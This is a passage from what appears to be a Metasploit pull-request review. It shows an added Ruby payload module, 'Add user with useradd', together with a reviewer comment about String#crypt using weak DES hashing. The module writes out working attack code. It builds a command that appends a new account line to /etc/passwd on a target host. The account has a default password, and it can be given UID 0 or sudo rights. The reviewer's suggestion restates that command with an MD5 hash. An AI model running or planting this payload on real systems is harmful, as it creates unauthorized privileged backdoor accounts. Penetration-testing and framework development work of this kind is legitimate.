modules/payloads/singles/cmd/unix/adduser.rb

```diff
@@ -0,0 +1,88 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 8
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Add user with useradd',
+        'Description' => %q{
+          Creates a new user. By default the new user is set with sudo
+          but other options exist to make the new user automatically
+          root but this is not automatically set since the new user will
+          be treated as root (and login may be difficult). The new user
+          can also be set as just a standard user if desired.
+        },
+        'Author' => 'Nick Cottrell <Rad10Logic>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::None,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'cmd',
+        'RequiredCmd' => 'generic',
+        'Payload' => {
+          'Offsets' => {},
+          'Payload' => ''
+        }
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'The username to create', 'metasploit' ]),
+        OptString.new('PASS', [ true, 'The password for this user', 'Metasploit$1' ])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptEnum.new('RootMethod', [false, 'Set the method that the new user can obtain root', 'SUDO', ['SUID', 'SUDO', 'NONE']]),
+        OptBool.new('CheckSudoers', [false, 'Add lines to only add to sudoers if file exists', true], conditions: %w[RootMethod == SUDO])
+      ]
+    )
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate(_opts = {})
+    vprint_good(command_string)
+    return super + command_string
+  end
+
+  def user
+    if datastore['USER'] !~ /^[a-z][-a-z0-9]*$/
+      raise ArgumentError, 'Username doesn\'t fit within regex /[a-z][-a-z0-9]*/'
+    end
+
+    datastore['USER']
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    suid = if datastore['RootMethod'] == 'SUID'
+             '0'
+           else
+             rand(1010..1999).to_s
+           end
+    payload_cmd = "echo \'#{user}:#{datastore['PASS'].crypt('Az')}:#{suid}:#{suid}::/:/bin/sh\'>>/etc/passwd"
```

Comment:
`String#crypt` is not recommended since it uses the platform native implementation (see the documentation [here](https://ruby-doc.org/3.0.5/String.html#method-i-crypt)) and it can be different from one to another. This can be an issue if Metasploit runs on Mac OSX and the target is a Linux host, for example. This issue has been discussed [here](https://github.com/rapid7/metasploit-framework/pull/16688#discussion_r900991259) and one solution was to use `UnixCrypt`.

Also, note that using `crypt` without specifying the encryption method will result in using the original DES-based algorithm, which only uses the first 8 characters of the password:
```
[18] pry(main)> "12345678".crypt('Az')
=> "Azc.VARqxkTMU"
[19] pry(main)> "123456789".crypt('Az')
=> "Azc.VARqxkTMU"
[20] pry(main)> "1234567890".crypt('Az')
=> "Azc.VARqxkTMU"
```
I would suggest to use another algorithm to avoid this limitation.
```suggestion
    passwd = UnixCrypt::MD5.build(datastore['PASS'], 'Az')
    payload_cmd = "echo \'#{user}:#{passwd}:#{suid}:#{suid}::/:/bin/sh\'>>/etc/passwd"
```